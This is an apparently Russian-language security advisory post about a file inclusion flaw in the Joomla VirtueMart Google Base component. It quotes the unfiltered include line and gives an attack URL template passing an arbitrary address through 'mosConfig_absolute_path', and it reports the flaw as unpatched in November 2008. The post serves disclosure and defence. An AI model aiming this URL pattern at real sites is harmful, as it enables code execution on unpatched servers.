Описание эксплойта:
Адрес файла (в частности, URL) передается через параметр "mosConfig_absolute_path" сценария "administrator/ components/ com_googlebase/ admin.googlebase.php".
Пример:
http:// [сайт]/ [путь]/ administrator/ components/ com_googlebase/ admin.googlebase.php? mosConfig_absolute_path=[адрес]
Уязвимый код:
include ($mosConfig_absolute_path. '/administrator/ components/ com_virtuemart/ virtuemart. cfg. php' );
Описание уязвимости:
В компоненте Joomla, VirtueMart Google Base, обнаружена уязвимость к включению произвольных удаленных или локальных файлов через параметр "mosConfig_absolute_path" сценария "administrator/ components/ com_googlebase/ admin.googlebase.php".
Параметр используется для включения файлов без предварительной фильтрации, в том виде, в котором был получен через URL.
ЗАЩИТА:
По данным на 6 ноября 2008 г., уязвимость не устранена.
Безопасность в интернете, то что должен знать каждый человек у которого есть компьютер! Информация будет полезна для администраторов, занимающихся обеспечением безопасности сетей, для программистов, стремящихся к созданию защищенных приложений, а также для всех тех, кто интересуется вопросами сетевой защиты.
0 коментарии:
Оставить коментарий